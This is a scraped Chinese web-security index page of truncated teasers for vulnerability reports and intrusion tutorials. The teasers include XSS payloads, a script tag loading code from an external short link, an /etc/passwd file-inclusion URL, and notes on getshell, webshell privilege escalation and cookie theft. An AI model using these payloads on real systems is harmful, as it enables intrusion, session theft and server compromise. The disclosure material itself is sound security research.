如何在网页上隐藏你的Email邮件地址 - 网站安全关注热度:14

你有一个网站，你想把email地址放在上面，让别人可以很方便地联系你，但是你又担心一旦公开邮箱地址，垃圾邮件可能会像洪水一样涌来。你 的担心是对的。现在网上抓取邮件地址的..[详情]

Hacker是这样写JS的 - 网站安全 - 自学php关注热度:22

注* XSS攻击即Cross Site Scripting，通常在网页链接地址Url中注入JS代码来达到攻击手段，很多大厂都中过招，如：Twitter，新浪微博，示例代码：http: www demo cn =scriptalert(document cookie) script..[详情]

常用安全测试用例 - 网站安全 - 自学php关注热度:20

建立整体的威胁模型，测试溢出漏洞、信息泄漏、错误处理、SQL 注入、身份验证和授权错误 1、输入验证客户端验证 服务器端验证(禁用脚本调试，禁用Cookies)1 输入很大的数（如4,294,9..[详情]

XDcms全版本后台getshell - 网站安全 - 自学php关注热度:48

xdcms后台网站配置基本信息的网站路径处过滤不严，仍可以插一句话拿shell。前提 magic_quotes_gpc=Off1 进后台，在基本信息中的网站路径处添加一句话，因为尖括号被转码，但是可以添加花..[详情]

搜狐邮箱存储型XSS（需点击） - 网站安全 - 自学关注热度:10

对用户输入过滤不严，导致可植入恶意代码。payload:svga xlink:href=javascript：alert(document domain) target=_blanktextAAAAA text a svgimage和rect之类的，由于被过滤了width和heig..[详情]

攻击JavaWeb应用[9]-Server篇[2] - 网站安全 - 自学ph关注热度:26

注：在继后门篇后已经有很长时间没更新了，这次一打算写写Server[1]的续集。喜欢B S吗？那我们今天干脆就来写一个简单的Web服务器吧。0x01 WebServerWeb服务器可以解析(handles)HTTP协议。当..[详情]

科普跨站平台XSS SHELL使用方法 - 网站安全 - 自学关注热度:16

理解xss shell是什么之前，让我们一起回顾一下一些基本的xss（跨站脚本），xss是最常见的一个漏洞，存在于今天许多的web应用程序。xss是攻击者试图通过web应用程序执行恶意脚本的技术..[详情]

php is_numberic函数安全吗 - 网站安全 - 自学php关注热度:18

0times;00 简介国内一部分CMS程序里面有用到过is_numberic函数，我们先看看这个函数的结构bool is_numeric ( mixed $var )如果 var 是数字和数字字符串则返回 TRUE，否则返回 FALSE。0times;01 函数..[详情]

Aspx下03系统0day的提权方法 - 网站安全 - 自学php关注热度:23

使用 Aspx下03系统0day的提权方法的提权成功率非常高 可是需要满足一下条件 1 webshell支持aspx 2 能执行cmd命令 3 系统盘有可写可读目录 需要使用到的工具有 1 churrasco exe 或..[详情]

webshell写入启动项目提权 - 网站安全 - 自学php关注热度:18

我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器权限 我们可以查看现在服务器上系统盘的可读可写目录 如果说服务器上的C: Documents and Settings All Users 「开始」菜..[详情]

emlog官方插件导致xss可打管理员cookie - 网站安全关注热度:21

emlog官方的反垃圾评论插件（感觉70%以上的人在用,因为内核代码里没有垃圾评论的处理，要处理垃圾评论只有用插件），未对某处xss进行过滤导致直接打管理员cookie。代码如下：?phpwhi..[详情]

NETCMS存在存储形XSS - 网站安全 - 自学php关注热度:21

NETCMS 存在跨站漏洞，可以盗取用户以及管理员cookieinurl:help HelpAdd aspx访问：http: www xxx com help HelpAdd aspx帮助标题处 利用审查元素更改表单元素将maxlength=15 改成maxlength=150往死死里..[详情]

大汉通版jis统一身份认证系统漏洞打包 - 网站安关注热度:27

大汉通版jis统一身份认证系统:在用户修改信息时进行抓包发现POST:http: 10 11 5 201:9080 jis front upduser_do jspCONTENT:c_id=00000vc_loginid=adminvc_password=123456vc_pwd=123456vc_username=系统管..[详情]

Java反射执行系统命令 - 网站安全 - 自学php关注热度:72

某些时候为了避免一些关键字或者限制，可以用反射去调用一些敏感的东东。比如某些WAF限制了：Runtime getRuntime() exec、import java lang reflect *。packageorg javaweb url;importjava io BufferedReader;i..[详情]

XSS盗cookie实战 - 网站安全 - 自学php关注热度:21

其实xss大家搜搜下就知道怎么利用了。。但是劫持账户上。大家可能觉得有两个难点 我在这里教大家。。1 如果收到被害者的cookie 其实可以在自己网站上做一个脚本来进行cookie收集。。..[详情]

也买酒篡改总订单金额便宜买拉菲拉 - 网站安全关注热度:22

也买酒购物车逻辑设计缺陷，商品数量可为负，导致总金额任意篡改漏洞。详细说明：购物车总金额=商品1times;数量+商品2times;数量这里虽然前台限制了数量，但是可以通过篡改post的数据..[详情]

腾讯QQ群无需群主和管理员权限修改群资料(已修关注热度:32

我创建了一个群，在修改好群资料（昵称，简介等等）之后提交的时候进行抓包，然后把post的数据中的群号改成了我加入的一个群，提交完毕，我加入的群资料被改。下图为修改并提交..[详情]

链家旗下自如主站文件包含(读取) - 网站安全 -关注热度:26

http: www ziroom com index php?_a=click_p= etc passwd%00 jpg修复方案：你懂得..[详情]

讨论“get”和“post”安全性 - 网站安全 - 自学关注热度:19

get安全，还是post安全？这或许是大家总结两者必须要分析的内容，因为这涉及到我们将内容从浏览器传送到服务器的安全性，选择不当将会带来巨大的不安全因素，从而可能带来巨大的..[详情]

伪静态转化动态执行注入 - 网站安全 - 自学php关注热度:27

第一次发帖子，就拿昨天的一个思路给大家吧。测试的CMS：建站之星。因为做伪静态也比较便于SEO，所以现在很多的CMS也有伪静态。然而，伪静态，主要是为了隐藏传递的参数名，它只..[详情]

cmseasy盲注 - 网站安全 - 自学php关注热度:27

出错的是一个通用函数，所以注入不只一处，在这里就用能够相对简单利用的来写。lib default ballot_act phpfunction index_action() { if (front::post( 39;submit 39;)) {..[详情]

JBoss远程方法调用漏洞利用详解 - 网站安全 - 自学关注热度:32

早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章，对我等菜鸟来说那边文章看起来还是很吃力的，所以查了查国内外的资料，翻译写了这边文章，记录一下。在JBoss服..[详情]

WordPress插件formcraft Sql注射 - 网站安全 - 自学php关注热度:25

标题 : WordPress formcraft Plugin Sql Injection 作者: Ashiyane Digital Security Team 软件下载: www wordpress org 测试环境: Windows , Linux 漏洞 : Sql..[详情]

iGENUS5.0邮件系统的一些漏洞打包（注射及登陆等关注热度:34

没事的时候下载了iGENUS5 0来看了看，时间紧，只看了个大概。大量政府、学校、科研机构、大型公司在使用这套系统。先说下我使用的版本和环境：整套程序，没有防注入措施，除邮件..[详情]

任我行CRM权限绕过、上传、XSS、SQL注入各种简单关注热度:45

任我行CRM系统的权限绕过、上传、XSS、SQL注入各种简单测试某公司内部网络使用这套系统，第一回见到，看到WEB应用就忍不住手贱~~1、上传个人平台里面的编写内部邮件的时候上传附件..[详情]

C#防SQL注入代码的实现方法 - 网站安全 - 自学ph关注热度:19

对于网站的安全性，是每个网站开发者和运营者最关心的问题。网站一旦出现漏洞，那势必将造成很大的损失。为了提高网站的安全性，首先网站要防注入，最重要的是服务器的安全设..[详情]

神州租车任意用户密码修改 - 网站安全 - 自学p关注热度:35

问题出在神州租车的app端，校验机制设计的太脆弱~下面是修改用户个人资料的请求数据包，数据包中的验证部分account、password居然是公共的所有用户的验证都是同样的值，又没有其他的..[详情]

安全狗高权限时的提权方法 - 网站安全 - 自学p关注热度:29

当权限是administrator时可以直接上远控并且成功执行exe恶意文件远控上线有的管理员以为安装了安全狗就万无一失，但是有了键盘记录这不等于像我们拿到权限后要做的事情一样么。安全..[详情]

联通wo邮箱存储型XSS - 网站安全 - 自学php关注热度:16

给邮箱发一封邮件，由于QQ邮箱发到wo邮箱总是投递不成功，内容我直接贴上来吧scriptalert(跨站) scriptscript src=http: goo gl Hprf82 script textareascript src=http: goo gl Hprf82..[详情]

Informix数据库SQL注入实战 - 网站安全 - 自学php关注热度:24

在最近的应用程序渗透测试中，我发现一个有意思的sql漏洞（SQLI中）。SQLI出现这种情况的原因:1 开发中带来的问题2 数据库正在使用下面，我来介绍介绍我遇到的问题以及如何解决并..[详情]